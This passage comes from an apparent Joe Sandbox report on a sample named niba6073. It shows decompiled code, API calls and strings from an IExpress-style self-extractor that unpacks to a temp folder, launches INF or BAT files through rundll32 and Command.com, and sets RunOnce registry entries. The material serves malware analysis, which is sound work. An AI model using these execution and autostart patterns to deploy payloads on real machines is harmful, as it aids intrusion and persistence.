				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00071680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00071A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00071781( &_v268, 0x104, _t111, "C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\");
					E0007658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00071680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E000766C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E000766C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00071680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00071781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E000716B3( &_v1552, 0x400, " ");
										E000716B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00072AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0007171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00071A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00071A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E000744B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x79120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x71140, _t156, 8,  &_v268) == 0) {
										 *0x79a34 =  *0x79a34 & 0xfffffffb;
										if( *0x79a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0007171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x79a34 =  *0x79a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00071680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00071680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00076CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x00071af3
0x00071afa
0x00071b07
0x00071b09
0x00071b1a
0x00071b20
0x00071b2c
0x00071b3b
0x00071b40
0x00071b2e
0x00071b2e
0x00071b33
0x00071b33
0x00071b46
0x00071b4c
0x00071b52
0x00071b57
0x00071b5d
0x00071b61
0x00071b9f
0x00071b9f
0x00071bb1
0x00071bc2
0x00000000
0x00071b63
0x00071b63
0x00071b65
0x00071b68
0x00071b68
0x00071b6a
0x00071b6b
0x00071b6f
0x00071b74
0x00000000
0x00000000
0x00071b76
0x00071b7b
0x00071b86
0x00000000
0x00000000
0x00000000
0x00000000
0x00071b8c
0x00071b8c
0x00071b98
0x00071bc7
0x00071bc9
0x00071bcc
0x00071bd3
0x00071d75
0x00071d76
0x00071d78
0x00071d7f
0x00071e05
0x00071e09
0x00000000
0x00000000
0x00071e12
0x00071e1b
0x00071e73
0x00071e21
0x00071e21
0x00071e28
0x00071e37
0x00071e3e
0x00071e52
0x00071e60
0x00071e60
0x00071e3e
0x00071e79
0x00071e7b
0x00071e84
0x00000000
0x00071d9b
0x00071d9b
0x00071da0
0x00071da2
0x00071da5
0x00071da5
0x00071da7
0x00071da8
0x00071dac
0x00071dae
0x00071db4
0x00071db7
0x00071db7
0x00071db9
0x00071dba
0x00071dbe
0x00071dc3
0x00071dce
0x00071dd2
0x00071deb
0x00000000
0x00071df0
0x00000000
0x00071dd2
0x00071bf7
0x00071bfe
0x00071c07
0x00071d55
0x00071d5a
0x00071d5b
0x00071d5d
0x00071d5e
0x00000000
0x00071c1b
0x00071c1b
0x00071c20
0x00071c2c
0x00071c33
0x00071c38
0x00071c3a
0x00071c3a
0x00071c40
0x00071c4b
0x00071c4b
0x00071c5d
0x00071c61
0x00071dd4
0x00071dd4
0x00071dd6
0x00071ddb
0x00071ddc
0x00071dde
0x00071d64
0x00071d64
0x00071d67
0x00071d6c
0x00000000
0x00071c67
0x00071c67
0x00071c6d
0x00071c72
0x00071c74
0x00071c74
0x00071c8e
0x00071c99
0x00071cc0
0x00071cf8
0x00071d07
0x00071d23
0x00071d09
0x00071d14
0x00071d1b
0x00071d1b
0x00071d2b
0x00071d2d
0x00071d2d
0x00071d38
0x00071d39
0x00071d46
0x00071cc2
0x00071cc2
0x00071ccc
0x00071cce
0x00071cce
0x00071cdb
0x00071ce6
0x00071cee
0x00071cee
0x00071e89
0x00071e91
0x00071e92
0x00071e94
0x00071e97
0x00071ea4
0x00071ea4
0x00071c61
0x00071c07
0x00071bd3
0x00071b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00071BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00071BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00071C57
GetPrivateProfileIntA.KERNEL32 ref: 00071C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00071140,00000000,00000008,?), ref: 00071CB8
GetShortPathNameA.KERNEL32 ref: 00071D1B

Part of subcall function 000744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00074518
Part of subcall function 000744B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 00074554

Strings

setupx.dll, xrefs: 00071D14
AdvancedINF, xrefs: 00071CAE
DefaultInstall, xrefs: 00071C74, 00071C87, 00071CCE, 00071CD3, 00071D2D, 00071D39
setupapi.dll, xrefs: 00071D23, 00071D3A
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00071BA0
Version, xrefs: 00071CB3
.BAT, xrefs: 00071D83
Command.com /c %s, xrefs: 00071D9B, 00071DE8
.INF, xrefs: 00071BDB
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00071D3B
", xrefs: 00071B25
Reboot, xrefs: 00071C82

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-21273240
Opcode ID: a8c5485ae6d1b589505a9828b8cf6a5980695dd35b47ca56fbbcadcae3c3cf9a
Instruction ID: fca4dfd630bb7e50d4489b08ce5d570f0f7413fe30d67dfe0935ba5669604220
Opcode Fuzzy Hash: a8c5485ae6d1b589505a9828b8cf6a5980695dd35b47ca56fbbcadcae3c3cf9a
Instruction Fuzzy Hash: 41A14C70E002186BEB709B2CCC45BEA77A99B91310F14C2A5E55DA72C1DBBC9DC5CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00072F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00072F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x78004; // 0xa87cf02e
				_v8 = _t9 ^ _t46;
				if( *0x78a38 != 0) {
					L5:
					_t11 = E00075164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00076CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E000755A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E0007658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x7a288("C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x78a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x78a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x78d48 & 0x000000c0;
									if(( *0x78d48 & 0x000000c0) == 0) {
										_t41 =  *0x79a40; // 0x3, executed
										_t26 = E0007256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x78a24; // 0x0
									 *0x79a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x78a38;
										if( *0x78a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00074169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x79a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00073BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x78a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00073B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E000744B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x79124 = E00076285();
							goto L16;
						}
						_t59 =  *0x79a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0007621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x78a24;
				if( *0x78a24 != 0) {
					L4:
					_t34 = E00073A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E000751E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x78a38;
				if( *0x78a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x00072f1d
0x00072f28
0x00072f2f
0x00072f3d
0x00072f6c
0x00072f6c
0x00072f71
0x00072f73
0x00073041
0x00073041
0x00073043
0x00073053
0x00073053
0x00072f79
0x00072f80
0x00000000
0x00072f86
0x00072f86
0x00072f93
0x00072f9e
0x00072fa0
0x00072fa6
0x00072fb8
0x00072fba
0x00072fbe
0x00072fc6
0x00072fcc
0x00072fd4
0x00072fd6
0x00072fd8
0x00072fe0
0x00072fe6
0x00072fee
0x00072ff0
0x00072ff5
0x00072ff5
0x00072fee
0x00072fd4
0x00072ff8
0x00072ffe
0x00073004
0x00073017
0x0007301c
0x00073024
0x00073054
0x0007305a
0x00073065
0x00073065
0x0007306c
0x0007306e
0x00073075
0x0007307a
0x0007307a
0x0007307c
0x00073081
0x00073087
0x00073089
0x000730a1
0x000730a1
0x000730a9
0x000730ab
0x000730ad
0x000730af
0x000730af
0x000730ad
0x000730b6
0x00000000
0x0007308b
0x0007308b
0x00073091
0x00000000
0x00000000
0x00073093
0x00073098
0x0007309a
0x00000000
0x00000000
0x0007309c
0x00000000
0x0007309c
0x00073089
0x0007305c
0x00073061
0x00073063
0x00000000
0x00000000
0x00000000
0x00073063
0x0007302b
0x00073032
0x0007303c
0x00000000
0x0007303c
0x00073006
0x0007300c
0x00000000
0x00000000
0x0007300e
0x00073015
0x00000000
0x00000000
0x00000000
0x00073015
0x00072f80
0x00072f3f
0x00072f46
0x00072f5f
0x00072f5f
0x00072f64
0x00072f66
0x00000000
0x00000000
0x00000000
0x00072f66
0x00072f4f
0x00000000
0x00000000
0x00072f55
0x00072f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 00072F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00072FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00072FC6
DecryptFileA.ADVAPI32 ref: 00072FE6
FreeLibrary.KERNEL32(00000000), ref: 00072FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0007301C

Part of subcall function 000751E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00072F4D,?,00000002,00000000), ref: 00075201

Strings

advapi32.dll, xrefs: 00072F99
DecryptFileA, xrefs: 00072FC0
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00072FDB, 00073017

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-1349829096
Opcode ID: ec36f609120dd2373631af3185f1ceea165d978fb66727e8132eae97c3284bb5
Instruction ID: 45cac0968828d3ec6e77c1b331dafe566b54243415ccface97299437ec735140
Opcode Fuzzy Hash: ec36f609120dd2373631af3185f1ceea165d978fb66727e8132eae97c3284bb5
Instruction Fuzzy Hash: 7941C930E006459AFB70AB359C5969A33E8AB45751F10C075E94DD2192EF7CCEC0DBDA

Uniqueness

Uniqueness Score: -1.00%

Function 00072390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00072390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x78004; // 0xa87cf02e
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00076CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00071680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E000716B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00071680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E000716B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E000716B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E0007658A( &_v280, 0x104, 0x71140);
								E00072390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x00072398
0x0007239e
0x000723a3
0x000723a5
0x000723ae
0x000723b3
0x000724cb
0x000724d2
0x000724d3
0x000724d4
0x000724df
0x000723c2
0x000723d1
0x000723db
0x000723e4
0x000723f6
0x000723fc
0x00072401
0x00000000
0x00000000
0x00000000
0x00000000
0x00072407
0x00072407
0x00072408
0x00072411
0x0007241f
0x0007247a
0x00072483
0x00072495
0x000724a3
0x00072421
0x0007242f
0x00072453
0x0007245d
0x00072466
0x00072472
0x00072472
0x0007242f
0x000724af
0x000724b5
0x000724be
0x000724c5
0x00000000
0x000724c5

APIs

FindFirstFileA.KERNELBASE(?,00078A3A,000711F4,00078A3A,00000000,?,?), ref: 000723F6
lstrcmpA.KERNEL32(?,000711F8), ref: 00072427
lstrcmpA.KERNEL32(?,000711FC), ref: 0007243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00072495
DeleteFileA.KERNEL32(?), ref: 000724A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 000724AF
FindClose.KERNELBASE(00000000), ref: 000724BE
RemoveDirectoryA.KERNELBASE(00078A3A), ref: 000724C5

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 225c959a46d02cd2fda8a9075a0c231aa36c54ec50625b61e7bc5206fac1973f
Instruction ID: c826713ee535ad5bc3c2153a7be9fedd879c11f5150ce243c24fc4091114901b
Opcode Fuzzy Hash: 225c959a46d02cd2fda8a9075a0c231aa36c54ec50625b61e7bc5206fac1973f
Instruction Fuzzy Hash: 1131A431F047409BD320EBA8CC89AEF73ECABC5305F04892DB55D96291EB3C9949C796

Uniqueness

Uniqueness Score: -1.00%

Function 00072BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00072BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x7a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x79124 = 0;
				if(E00072CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00072F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E000752B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x78a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x79a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00071F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x78588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x79124; // 0x80070002
				return _t7;
			}

0x00072c03
0x00072c0d
0x00072c18
0x00072c20
0x00072c2e
0x00072c32
0x00072c36
0x00072c3d
0x00072c43
0x00072c45
0x00072c47
0x00072c49
0x00072c4e
0x00072c4e
0x00072c47
0x00072c32
0x00072c20
0x00072c50
0x00072c54
0x00072c57
0x00072c64
0x00072c66
0x00072c6b
0x00072c6d
0x00072c74
0x00072c76
0x00072c7c
0x00072c7e
0x00072c87
0x00072c89
0x00072c89
0x00072c87
0x00072c7c
0x00072c74
0x00072c8e
0x00072c95
0x00072c98
0x00072c98
0x00072c9e
0x00072ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,00076BB0,00070000,00000000,00000002,0000000A), ref: 00072C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,00076BB0,00070000,00000000,00000002,0000000A), ref: 00072C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00072C28
CloseHandle.KERNEL32(00000000,?,?,00076BB0,00070000,00000000,00000002,0000000A), ref: 00072C98

Strings

Kernel32.dll, xrefs: 00072C13
HeapSetInformation, xrefs: 00072C22

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: 6b0f789e0abe51e633e495061d4e94c80f9de15a4ad5bd5ad8d82739acdb3929
Instruction ID: 8e59470888890815acdf356809550b9e43b61027fb7d06acec8315d5892b7570
Opcode Fuzzy Hash: 6b0f789e0abe51e633e495061d4e94c80f9de15a4ad5bd5ad8d82739acdb3929
Instruction Fuzzy Hash: 2111EC71F003455BF7116B759C49AAF3799DB94350B14C025F90CF3252DA3DEC91869D

Uniqueness

Uniqueness Score: -1.00%

Function 00076F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00076F40() {

				SetUnhandledExceptionFilter(E00076EF0); // executed
				return 0;
			}

0x00076f45
0x00076f4d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00076F45

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 5d3fd6b6b7ca30b8909458de424a915f5c6be524811619a7cacfac640c5a83b2
Instruction ID: 37ca2ba7fc941795434bd60b7f8fc9449dec64ee361780cac615e0147155cabd
Opcode Fuzzy Hash: 5d3fd6b6b7ca30b8909458de424a915f5c6be524811619a7cacfac640c5a83b2
Instruction Fuzzy Hash: 22900264B5150047B6501B709D1945975915B8E612BC19460A11AD8494DB6D40809526

Uniqueness

Uniqueness Score: -1.00%

Function 0007202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0007202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x78004; // 0xa87cf02e
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00076CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E0007171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0007658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x79a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
